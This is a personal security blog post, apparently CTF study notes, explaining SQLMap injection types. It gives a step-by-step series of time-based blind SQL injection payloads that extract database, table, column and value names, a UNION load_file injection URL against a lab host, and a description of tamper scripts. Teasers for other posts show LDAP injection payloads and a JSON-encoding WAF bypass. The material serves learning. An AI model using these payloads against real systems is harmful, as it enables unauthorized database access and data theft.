Time-based SQLMap and Tamper scripts construct

Types of SQLMap:

  • Boolean-based blind: replaces or appends to the affected parameter in the HTTP request. Alternatively, the user can provide a string or regular expression to match on True pages.
  • Time-based blind: For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool inference the output of the injected statement character by character. 
  • Error-based: This technique works only when the web application has been configured to disclose back-end database management system error messages.
  • UNION query-based: UNION ALL SELECT, execute the for loop

http://178.62.0.100:32104/portfolio.php?id=1 union all select 1,load_file("/var/www/html/administrat/panel.php),3-- 

  • Stacked queries: piggybacking. it appends to the affected parameter in the HTTP request, a semi-colon (;) followed by the SQL statement to be executed.


Time-based blind injection: 

How time-based blind injection works?

The function will use:

sleep(s) # the interval between execution

mid(s,n,len) # truncate specific ‘len' from nth in s

length(s) #return to the length of s

if(expr,v1, v2) # if expr is true, return to v1, otherwise return to v2

substring(s,n,len) $ truncate specific ‘len’ from nth in s

ascii(s) return the ascii code of the first character in s

limit # limit return query numbers
database() #current database

0x00: Database

guess the length of the database's name:

(if((length(database())=4),sleep(5),0)) 

If the length is 4, sleep 5 secs.

Guess the database's name:

if the first character is 'a', sleep 5 secs

sleep(if((mid(database(),1,1)="a"),5,0))

sleep(if((ascii(substr(database(),1,1)))=97),5,0))  

0x01: Table

guess the table name's length and guess the name:

guess the table’s length:

        (select sleep(if((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6,5,0)))

guess the table’s name
        (select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='c'),5,0)))
        (select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)='i'),5,0)))
        (select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1)='t'),5,0)))
        (select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1)='y'),5,0))) 


0x02: Array

Guess the array:

Guess the length of the array:
 (select sleep(if((select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1)=2,5,0))) 

Guess the array name:
(select sleep(if((mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1),1,1)='I'),5,0))) (select sleep(if((mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1),2,1)='D'),5,0))) 


0x03: Value


Guess value’s length
        (select sleep(if((select length(ID) from world.city limit 0,1)=1,5,0)))
Guess value
        (select sleep(if((mid((select ID from world.city limit 0,1),1,1)='1'),5,0))) 


Tamper scripts :

What is Tamper used for?

Sometimes the websites only accept the specific encrypted data.

For example:


So SQLMap need to feed a specific type of data to do the injection.

We can use tamper scripts to encode the data first. SQLMap has its own encode scripts, named Tamper. These scripts located at '/usr/share/sqlmap/tamper' by default.

The command is :

sqlmap —tamper=base64 

For example, base64:


Construct Tamper scripts 

But sometimes the default tamper folder doesn't have a specific encode function, like JSON. Here is the script wrote by me referring to the base64 scripts. 






Popular posts from this blog

Phonebook - Hack the box Write up -- Web LDAP injection

Image
 0x00 Problem  0x01 Check the vulnerability When we see the login form on the website, it might be command injection, SQL injection, LDAP injection.  We can see that this need us to login with workstation username, it might be LDAP injection. 0x02 LDAP injection payload Here is the basic LDAP injection payload. We can check the vulnerability. user=*)(& password=*)(& --> (&(user=*)(&)(password=*)(&))  After we type it, we found the response shows successful, and return a page has search box. Then we type a character in the search box, and it returns some user phonebook information. I tried 'flag', 'HTB', it doesn't find any results. Then we try to find user 'Reese', but the information doesn't look like flag.   0x03 Locate the flag  Then we change our payload to check if the password is the flag. user=Reese password=HTB*)(& --> (&(user=Reese)(password=HTB*)(&  It can also return to the search page which means it...
Read more

wafwaf -- Hack The Box -- Web SQL injection

Image
0x00 Problem 0x01 Check the Source Code We open the website and only see the source code on the website. As we can see, there is a WAF will filter some characters and words, that means the normal injection will not work. However, we can see, there is a json_decode() function will decode JSON data, that means the data can be accepted should be JSON format.  The example JSON format data is like: /u0074, /u0075. In addition, there is a "php://input",  accesses the read-only stream of the requested raw data, executing the data in the post request as PHP code. 0x02 Local Test We can launch an Apache server to test it. I copy the source code and make a little change to test this. This file is in /var/www/html. We will construct the data first. This time I use 'select' as an example. The word transfer to ASCII, then to hex, then replace the '\0x' as '\u00'. This can be test in the browser console. At the end, we can test it with curl . As we can see, the SQL...
Read more

Cheat sheet for security+

Image
Malware virus: need people action to execute and spread. Hoax: trick the victim to infect, like game. worms: spread and execute without humman  trojans: can get remote control. RAT(remote access Trojan) ransomware: take control of your computer system, pay for unlock, most time will not unlock if you pay spyware: audit the callender, website history and other actions. rootkit: a type of backdoor, software design to administrative level control or root priviledge without detection. use DLL injection. malicious code inserted into a running process or kernel-mode device drvier. intercept calls and redirect to the malicous code. spam: CAN-Spam Act law to stop relaying send out email through other's mail server. Spim(instant message) like chat, text message.
Read more